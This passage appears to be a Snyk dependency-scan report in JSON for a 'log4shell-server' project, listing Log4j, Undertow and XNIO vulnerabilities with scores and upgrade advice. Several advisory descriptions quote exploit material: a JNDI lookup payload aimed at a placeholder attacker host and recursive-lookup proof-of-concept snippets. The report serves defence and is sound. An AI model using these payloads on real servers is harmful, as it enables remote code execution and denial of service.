"triageAdvice": null - }, - "language": "java", - "severity": "low", - "cvssScore": 2.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "io.undertow:undertow-core", - "references": [ - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437", - "title": "Red Hat Bugzilla Bug" - }, - { - "url": "https://access.redhat.com/errata/RHSA-2024:4392", - "title": "Red Hat Security Advisory" - }, - { - "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562", - "title": "Vulnerable Code" - } - ], - "cvssDetails": [], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N", - "assigner": "Snyk", - "severity": "low", - "baseScore": 2.3, - "cvssVersion": "4.0", - "modificationTime": "2024-07-10T14:39:24.891744Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "low", - "baseScore": 3.1, - "cvssVersion": "3.1", - "modificationTime": "2024-07-10T14:39:24.891744Z" - } - ], - "description": "## Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n## Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n## Remediation\nThere is no fixed version for `io.undertow:undertow-core`.\n\n## References\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n", - "epssDetails": { - "percentile": "0.16001", - "probability": "0.00045", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2024-3653" - ], - "CWE": [ - "CWE-401" - ], - "GHSA": [ - "GHSA-ch7q-gpff-h9hp" - ] - }, - "packageName": "io.undertow:undertow-core", - "proprietary": false, - "creationTime": "2024-07-10T07:43:42.505449Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-07-09T00:31:40Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "io.undertow", - "artifactId": "undertow-core" - }, - "publicationTime": "2024-07-10T14:39:24.891304Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-07-10T14:39:24.891744Z", - "socialTrendAlert": false, - "severityWithCritical": "low", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "io.undertow:undertow-core", - "version": "2.2.13.Final" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", - "title": "Remote Code Execution (RCE)", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.2)", - "[2.13.0,2.16.0)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.1", - "2.12.2", - "2.16.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f", - "title": "Apache Pony Mail" - }, - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Page" - }, - { - "url": "https://twitter.com/marcioalm/status/1471740771581652995", - "title": "Twitter Post" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml", - "title": "Nuclei Templates" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", - "cvssV3BaseScore": 9, - "modificationTime": "2024-03-11T09:51:51.455756Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:56.296034Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:32.295395Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.455756Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:56.296034Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) if one of the following conditions is met:\r\n\r\n1. Logging configuration explicitly enables lookups – either by default (if using a version lower than 2.15.0) or manually by using `%m{lookups}` as `formatMsgNoLookups` is switched on by default as of version 2.15.0.\r\n2. Or uses a non-default Pattern Layout with Context Lookup where attackers can control input data via Thread Context Map (MDC),\r\n3. Or uses `Logger.printf(\"%s\", userInput)` function where attackers can control the userInput variable.\r\n\r\nA malicious actor is able to bypass the mitigation implemented in version 2.15.0 that limits JNDI lookups to localhost only: `${jndi:ldap://127.0.0.1#evilhost.com:1389/a}`.\r\n\r\nWe recommend updating to version 2.16.0 which completely disables JNDI lookups by default. If upgrading is not an option, this issue can be mitigated in prior releases by removing the `JndiLookup` class from the classpath (example: `zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class`).\r\n\r\n### PoC\r\n\r\nIn config:\r\n```\r\n%d %p %c{1.} [%t] $${ctx:loginId} %m%n\r\n```\r\n\r\nIn code:\r\n```java\r\nThreadContext.put(\"loginId\", UserControlledInput);\r\n```\r\n\r\n### History\r\n\r\nThis vulnerability was previously assigned a CVSS score of 3.7 (Low), and the impact was believed to be Denial of Service (DoS).\r\n\r\nFurthermore, the advisory previously mentioned Thread Context Map patterns (%X, %mdc, or %MDC) as being vulnerable to this issue, but that has since been proven wrong.\r\n\r\nOn December 17, 2021 new information came to light, demonstrating that an Arbitrary Code Execution vulnerability still exists in version 2.15.0 of Log4j due to a bypass to the localhost-only lookup mechanism.\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.2, 2.16.0 or higher.\n## References\n- [Apache Pony Mail](https://lists.apache.org/thread/83y7dx5xvn3h5290q1twn16tltolv88f)\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [Twitter Post](https://twitter.com/marcioalm/status/1471740771581652995)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-45046.yaml)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n", - "epssDetails": { - "percentile": "0.99913", - "probability": "0.97364", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-45046" - ], - "CWE": [ - "CWE-94" - ], - "GHSA": [ - "GHSA-7rjr-3q55-vv33" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-14T18:28:31.339218Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-14T18:01:28Z", - "exploitDetails": { - "sources": [ - "CISA", - "Nuclei Templates", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Attacked", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-14T18:44:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:25.837600Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.15.0" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.16.0" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.15.0" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", - "title": "Denial of Service (DoS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "credit": [ - "Hideki Okamoto of Akamai Technologies" - ], - "semver": { - "vulnerable": [ - "[2.0-beta9,2.3.1)", - "[2.4,2.12.3)", - "[2.13.0,2.17.0)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.1", - "2.12.3", - "2.17.0" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3230", - "title": "JIRA Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:51:51.570474Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:58.516498Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:38.288854Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:51.570474Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.516498Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). Does not protect against uncontrolled recursion from self-referential lookups. \r\n\r\nWhen the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, `$${ctx:loginId}`), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a `StackOverflowError` that will terminate the process.\r\n\r\n### PoC\r\n\r\nIn `log4j.properties`:\r\n```java\r\nappender.console.type = Console\r\nappender.console.name = console\r\nappender.console.layout.type = PatternLayout\r\nappender.console.layout.pattern = !${ctx:test}! %m%n\r\nrootLogger.level = ALL\r\nrootLogger.appenderRef.file.ref = console\r\n```\r\n\r\nIn `Main.java`:\r\n```java\r\nThreadContext.put(\"test\", \"${::-${ctx:test}}\");\r\nlogger.error(\"boom\"); // Will not be logged\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.1, 2.12.3, 2.17.0 or higher.\n## References\n- [Apache Security](https://logging.apache.org/log4j/2.x/security.html)\n- [JIRA Issue](https://issues.apache.org/jira/browse/LOG4J2-3230)\n", - "epssDetails": { - "percentile": "0.99624", - "probability": "0.96524", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-45105" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-17T18:23:58.542986Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-17T18:20:21Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-18T07:05:00Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:58.516498Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.15.0" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.17.0" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.15.0" - }, - { - "id": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", - "title": "Arbitrary Code Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.0-beta7,2.3.2)", - "[2.4,2.12.4)", - "[2.13.0,2.17.1)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.3.2", - "2.12.4", - "2.17.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.6, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.logging.log4j:log4j-core", - "references": [ - { - "url": "https://logging.apache.org/log4j/2.x/security.html", - "title": "Apache Security Page" - }, - { - "url": "https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16", - "title": "GitHub Commit" - }, - { - "url": "https://issues.apache.org/jira/browse/LOG4J2-3293", - "title": "Jira Issue" - }, - { - "url": "https://www.openwall.com/lists/oss-security/2021/12/28/1", - "title": "Openwall Mail" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 6.6, - "modificationTime": "2024-03-11T09:48:51.766965Z" - }, - { - "assigner": "Red Hat", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 6.6, - "modificationTime": "2024-03-11T09:53:58.472982Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:47.220633Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:51.766965Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "medium", - "baseScore": 6.6, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:58.472982Z" - } - ], - "description": "## Overview\n[org.apache.logging.log4j:log4j-core](http://logging.apache.org/log4j/1.2/) is a logging library for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution.
**Note:** Even though this vulnerability appears to be related to the [log4Shell vulnerability](https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720), this vulnerability requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.\r\n\r\nAn attacker with access to modification of logging configuration is able to configure `JDBCAppender` with a data source referencing a JNDI URI - which can execute malicious code.\r\n\r\nIn the fixed versions, `JDBCAppender` is using `JndiManager` and disables JNDI lookups by default (via `log4j2.enableJndiJdbc=false`).\r\n\r\n## Alternative Remediation\r\nIf you have reason to believe your application may be vulnerable and upgrading is not an option, you can either:\r\n\r\n* Disable/remove `JDBCAppender`\r\n* If `JDBCAppender` is used, make sure that it is not configured to use any protocol other than Java\n## Remediation\nUpgrade `org.apache.logging.log4j:log4j-core` to version 2.3.2, 2.12.4, 2.17.1 or higher.\n## References\n- [Apache Security Page](https://logging.apache.org/log4j/2.x/security.html)\n- [GitHub Commit](https://github.com/apache/logging-log4j2/commit/05db5f9527254632b59aed2a1d78a32c5ab74f16)\n- [Jira Issue](https://issues.apache.org/jira/browse/LOG4J2-3293)\n- [Openwall Mail](https://www.openwall.com/lists/oss-security/2021/12/28/1)\n", - "epssDetails": { - "percentile": "0.89602", - "probability": "0.02239", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2021-44832" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.logging.log4j:log4j-core", - "proprietary": false, - "creationTime": "2021-12-28T19:42:55.818691Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2021-12-28T19:42:53Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.logging.log4j", - "artifactId": "log4j-core" - }, - "publicationTime": "2021-12-28T20:17:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:58.472982Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "org.apache.logging.log4j:log4j-core@2.15.0" - ], - "upgradePath": [ - false, - "org.apache.logging.log4j:log4j-core@2.17.1" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.logging.log4j:log4j-core", - "version": "2.15.0" - }, - { - "id": "SNYK-JAVA-ORGJBOSSXNIO-2994360", - "title": "Allocation of Resources Without Limits or Throttling", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,3.8.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.8.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.3, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.jboss.xnio:xnio-api", - "references": [ - { - "url": "https://github.com/xnio/xnio/commit/fdefb3b8b715d33387cadc4d48991fb1989b0c12", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/xnio/xnio/pull/291", - "title": "GitHub PR" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2064226", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-04-27T13:34:34.076065Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:49:50.426700Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:05:00.412483Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-04-27T13:34:34.076065Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:50.426700Z" - } - ], - "description": "## Overview\n[org.jboss.xnio:xnio-api](https://mvnrepository.com/artifact/org.jboss.xnio/xnio-api) is a simplified low-level I/O layer which can be used anywhere you are using NIO.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the `notifyReadClosed` method by allowing an attacker to send flawed requests to a server, possibly causing log contention-related performance concerns or an unwanted disk fill-up.\n## Remediation\nUpgrade `org.jboss.xnio:xnio-api` to version 3.8.8 or higher.\n## References\n- [GitHub Commit](https://github.com/xnio/xnio/commit/fdefb3b8b715d33387cadc4d48991fb1989b0c12)\n- [GitHub PR](https://github.com/xnio/xnio/pull/291)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2064226)\n", - "epssDetails": { - "percentile": "0.53436", - "probability": "0.00164", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2022-0084" - ], - "CWE": [ - "CWE-770" - ], - "GHSA": [ - "GHSA-76fg-mhrg-fmmg" - ] - }, - "packageName": "org.jboss.xnio:xnio-api", - "proprietary": false, - "creationTime": "2022-08-28T06:46:31.563692Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2022-08-28T06:35:33Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.jboss.xnio", - "artifactId": "xnio-api" - }, - "publicationTime": "2022-08-28T09:48:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-04-27T13:34:34.076065Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final", - "org.jboss.xnio:xnio-api@3.8.4.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.33.Final", - "org.jboss.xnio:xnio-api@3.8.16.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.jboss.xnio:xnio-api", - "version": "3.8.4.Final" - }, - { - "id": "SNYK-JAVA-ORGJBOSSXNIO-6403375", - "title": "Uncontrolled Resource Consumption", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,3.8.14)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "3.8.14" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.jboss.xnio:xnio-api", - "references": [ - { - "url": "https://github.com/xnio/xnio/commit/ffabdcdda508ef87aeadad5ca3f854e274d60ec1", - "title": "GitHub Commit" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241822", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-04-27T13:45:18.043553Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-04-24T07:16:49.813145Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-04-27T13:45:18.043553Z" - } - ], - "description": "## Overview\n[org.jboss.xnio:xnio-api](https://mvnrepository.com/artifact/org.jboss.xnio/xnio-api) is a simplified low-level I/O layer which can be used anywhere you are using NIO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption due to the `NotifierState` function that can cause a Stack Overflow Exception when the chain of notifier states becomes problematically large, leading to a possible denial of service.\n## Remediation\nUpgrade `org.jboss.xnio:xnio-api` to version 3.8.14 or higher.\n## References\n- [GitHub Commit](https://github.com/xnio/xnio/commit/ffabdcdda508ef87aeadad5ca3f854e274d60ec1)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2241822)\n", - "epssDetails": { - "percentile": "0.10602", - "probability": "0.00044", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2023-5685" - ], - "CWE": [ - "CWE-400" - ] - }, - "packageName": "org.jboss.xnio:xnio-api", - "proprietary": false, - "creationTime": "2024-03-06T14:54:57.557703Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2024-03-05T00:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.jboss.xnio", - "artifactId": "xnio-api" - }, - "publicationTime": "2024-03-07T06:05:43.052310Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-04-27T13:45:18.043553Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.snyk:log4shell-server@0.0.1-SNAPSHOT", - "io.undertow:undertow-core@2.2.13.Final", - "org.jboss.xnio:xnio-api@3.8.4.Final" - ], - "upgradePath": [ - false, - "io.undertow:undertow-core@2.2.33.Final", - "org.jboss.xnio:xnio-api@3.8.16.Final" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.jboss.xnio:xnio-api", - "version": "3.8.4.Final" - } - ], - "ok": false, - "dependencyCount": 12, - "org": "austin.doll", - "policy": "# Snyk (https://snyk.io) policy file, patches or ignores known vulnerabilities.\nversion: v1.25.1\nignore: {}\npatch: {}\n", - "isPrivate": true, - "licensesPolicy": { - "severities": {}, - "orgLicenseRules": { - "AGPL-1.0": { - "licenseType": "AGPL-1.0", - "severity": "high", - "instructions": "" - }, - "AGPL-3.0": { - "licenseType": "AGPL-3.0", - "severity": "high", - "instructions": "" - }, - "Artistic-1.0": { - "licenseType": "Artistic-1.0", - "severity": "medium", - "instructions": "" - }, - "Artistic-2.0": { - "licenseType": "Artistic-2.0", - "severity": "medium", - "instructions": "" - }, - "CDDL-1.0": { - "licenseType": "CDDL-1.0", - "severity": "medium", - "instructions": "" - }, - "CPOL-1.02": { - "licenseType": "CPOL-1.02", - "severity": "high", - "instructions": "" - }, - "EPL-1.0": { - "licenseType": "EPL-1.0", - "severity": "medium", - "instructions": "" - }, - "GPL-2.0": { - "licenseType": "GPL-2.0", - "severity": "high", - "instructions": "" - }, - "GPL-3.0": { - "licenseType": "GPL-3.0", - "severity": "high", - "instructions": "" - }, - "LGPL-2.0": { - "licenseType": "LGPL-2.0", - "severity": "medium", - 